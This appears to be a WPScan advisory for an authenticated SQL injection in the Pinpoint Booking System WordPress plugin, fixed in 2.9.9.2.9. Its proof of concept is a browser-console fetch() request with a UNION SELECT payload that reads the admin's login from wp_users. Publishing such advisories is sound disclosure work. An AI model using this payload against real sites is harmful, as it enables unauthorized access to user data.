WordPress Plugin Vulnerabilities
Pinpoint Booking System < 2.9.9.2.9 - Subscriber+ SQLi
Description
The plugin does not validate and escape one of its shortcode attributes before using it in a SQL statement, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks.
Proof of Concept
Note: A Calendar is needed (if there is not one already).
Run the below command in the developer console of the web browser while being on the blog as a subscriber
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=parse-media-shortcode&shortcode=[dopbs id=\'1\' lang=\'en UNION SELECT 100000, CONCAT("DAY_MONDAY"), "", "", user_login COLLATE utf8mb4_unicode_520_ci,"frontend" FROM wp_users WHERE wp_users.ID = 1 --\']'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
The login of the first user (ie the admin) will be displayed in the calendar data json, within the text[names] attribute.
Affects Plugins
Fixed in 2.9.9.2.9 References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-01-23 (about 1 years ago)
Added
2023-01-23 (about 1 years ago)
Last Updated
2023-01-23 (about 1 years ago)
WPScan 